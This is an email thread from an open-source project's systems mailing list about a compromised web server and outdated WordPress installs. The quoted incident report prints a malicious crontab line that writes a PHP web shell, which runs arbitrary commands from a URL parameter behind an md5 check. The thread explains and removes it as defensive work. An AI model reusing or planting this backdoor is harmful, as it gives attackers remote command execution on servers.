<div dir="ltr"><div class="gmail_extra"><div class="gmail_quote">On Tue, Mar 1, 2016 at 3:21 AM, Bernie Innocenti <span dir="ltr"><<a href="mailto:bernie@codewiz.org" target="_blank">bernie@codewiz.org</a>></span> wrote:<br><blockquote class="gmail_quote" style="margin:0px 0px 0px 0.8ex;border-left-width:1px;border-left-color:rgb(204,204,204);border-left-style:solid;padding-left:1ex"><span class="">On 02/25/2016 04:09 AM, Sebastian Silva wrote:<br>
> Remember in June we had an incident with a broken Wordpress site.<br>
> I switched to static generator since then.<br>
><br>
> +1 on containers just learning more about them and finding them fascinating.<br>
> Count me in on containerizing everything.<br>
><br>
> I'm not aware of other wordpress sites. Maybe walter's blog?<br>
> Wordpress is a PIA IMHO.<br>
<br>
</span>Yes, WP is riddled with security holes. Back in October, Samuel helped<br>
Walter upgrade <a href="http://walterbender.org" rel="noreferrer" target="_blank">walterbender.org</a> on sunjammer. Samuel, can you confirm<br>
that the WP instance now fully patched and locked down?<br></blockquote><div><br></div><div>The WP version on <a href="http://walterbender.org">walterbender.org</a> site is 4.3.1. The WP last version is 4.4.2. I have checked the WP change log and we can find this:</div><div><br></div><div>4.4.1 => WordPress versions 4.4 and earlier are affected by a cross-site scripting vulnerability that could allow a site to be compromised.</div><div><br></div><div>4.4.2 => WordPress versions 4.4.1 and earlier are affected by two security issues: a possible SSRF for certain local URIs, and an open redirection attack.</div><div><br></div><div>This site also uses the 2.5.9 akismet plugin. The last version is 3.1.7. Significant information on the release notes:</div><div><ul><li>Pre-emptive security improvements to ensure that the Akismet plugin can't be used by attackers to compromise a WordPress installation.<br></li><li>Closes a potential XSS vulnerability.<br></li></ul><div>Of course, every version has a lot of bug fixes. We definitely should upgrade it and test nothing breaks <a href="http://walterbender.org">walterbender.org</a> site.</div></div><div><br></div><div>Who is in charge of upgrading the others WP sites?</div><div><br></div><div>Regards,</div><div><br></div><div>Samuel C.</div><div> </div><blockquote class="gmail_quote" style="margin:0px 0px 0px 0.8ex;border-left-width:1px;border-left-color:rgb(204,204,204);border-left-style:solid;padding-left:1ex">
<div class=""><div class="h5"><br>
<br>
> Regards,<br>
> Sebastian<br>
><br>
><br>
> On 25/02/16 04:47, Bernie Innocenti wrote:<br>
>> While I was looking for cronjobs in /var/spool/cron/crontabs/, i found<br>
>> that www-data was executing commands like these:<br>
>><br>
>> */27 * * * * echo '<?php if (substr(md5($_GET["localdate"]),0,6) ==<br>
>> "6fbcb8") { $time = str_replace("@"," ",$_GET["localtime"]);<br>
>> @system($time); exit; } ?>' > /srv/www-somosazucar/blog/.cache.php<br>
>><br>
>> Did you spot the system()? This executes arbitrary commands specified<br>
>> via the "localtime" url parameter. Uh-oh.<br>
>><br>
>> There were about a dozen lines like the above, installing .cache.php in<br>
>> various virtualhosts. I kept a copy of the file in<br>
>> /root/www-data.backdoor. The file was last written on Jun 23  2015,<br>
>> which may correlate with the switch to the new website.<br>
>><br>
>> I cleared the mess and searched the logs for requests containing<br>
>> "localtime", but couldn't find any. I wonder if they could filter the<br>
>> logs, since they were previously writable by www-data.<br>
>><br>
>> Please watch out. We should ensure directories accessible over http are<br>
>> not writable by user www-data, especially those in which PHP and CGIs<br>
>> are enabled.<br>
>><br>
>> Running several large sites under the same uid has always been a bad<br>
>> security practice, and looking forward we should keep migrating them to<br>
>> properly isolated containers.<br>
>><br>
>> Finally, Wordpress is particularly dangerous and we should update and<br>
>> harden all instances. Can someone please take care of this? I'll do<br>
>> Mediawiki, which I know pretty well.<br>
>><br>
><br>
<br>
<br>
--<br>
</div></div><span class="im"> _ // Bernie Innocenti<br>
 \X/  <a href="http://codewiz.org" rel="noreferrer" target="_blank">http://codewiz.org</a><br>
</span><div class=""><div class="h5">_______________________________________________<br>
Systems mailing list<br>
<a href="mailto:Systems@lists.sugarlabs.org">Systems@lists.sugarlabs.org</a><br>
<a href="http://lists.sugarlabs.org/listinfo/systems" rel="noreferrer" target="_blank">http://lists.sugarlabs.org/listinfo/systems</a><br>
</div></div></blockquote></div><br></div></div>